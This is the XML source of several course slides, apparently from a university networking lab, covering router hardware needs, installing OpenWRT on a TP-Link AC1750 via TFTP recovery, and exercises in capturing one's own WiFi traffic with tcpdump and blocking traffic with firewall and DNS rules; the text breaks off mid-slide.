                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LAN connector required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>at least 16 MByte of Flash for full OpenWRT support and space for packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>at least 128 MByte RAM: for storing small network traffic pcap files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>USB connection: for storing bigger pcap files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C0995C0-F814-8043-A5E9-131F3D44F087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3824052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31881" y="115577"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TP-Link AC1750</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Google Shape;73;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="2167467"/>
            <a:ext cx="11360800" cy="4306166"/>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Price: ~50$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Multiple versions of hardware, but all Qualcomm Atheros based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>16 MByte of Flash, 128 MByte of RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>USB connector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.4 GHz and 5 GHz WiFi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Supports TFTP recovery so it’s hard to brick permanently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UART connection on board (but RX needs to be soldered)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{976D7506-B260-544B-A09F-5E2E7E3E5F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1506915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15600" y="57858"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Installing OpenWRT on TP-Link AC1750</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="1717962"/>
            <a:ext cx="11360800" cy="4161433"/>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See: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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https://openwrt.org/toh/tp-link/archer-c7-1750</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C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 Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Direct installation via the web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TFTP recovery (Works for most TP-Link routers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TFTP recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bootloader on Router probes TFTP server in the first seconds of booting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expects TFTP server at special IP address, in most cases: 192.168.0.88</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expect special filename for firmware, for the AC1750 v5: ArcherC7v5_tp_recovery.bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bootloader installs firmware automatically, if the conditions are met</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Helpful software: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tftpd for Windows (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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http://tftpd32.jounin.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tftpd-hpa for linux (available via package manager)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44C850A-F1F7-064B-A323-71AE4ACF97C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1299550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91995"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exercises with OpenWRT, 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415600" y="1621299"/>
            <a:ext cx="11360800" cy="4555200"/>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Install OpenWRT on your router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configure the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connect to the router via web interface (192.168.1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Connect the router to the Internet via the WAN port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Install tcpdump on the router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configure a WiFi network on the router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intercept your own traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connect to the router via SSH (tcpdump does not have a web interface)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connect a device, e.g. your smartphone, to the WiFi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>run tcpdump on the WiFi interface (tcpdump -i wlan0) and monitor the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attach USB stick to the router</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>write network traffic into a pcap file on the stick (tcpdump -i wlan0 -s 0 -w mytraffic.pcap)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>analyze the the recorded pcap file on your computer using Wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A3C287C-E9BF-6646-9450-C49B632EEA92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="de" smtClean="0"/>
              <a:pPr algn="r"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="de" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3476864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512582" y="0"/>
            <a:ext cx="11360800" cy="763600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exercises with OpenWRT, 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727345" y="1662423"/>
            <a:ext cx="10737309" cy="4555200"/>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Block all network traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>create a firewall rule which blocks all the traffic from your connected phone (check the IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>check if the traffic is actually blocked on your phone (e.g. by opening a website)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Block specific traffic via firewall rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>create a firewall rule for the IP hosting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.northeastern.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hint: you cannot block servers based on the hostname directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>warning: CDNs might have multiple IPs behind the same hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Block traffic via DNS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>check that </a:t>
            </a:r>
            <a:r>
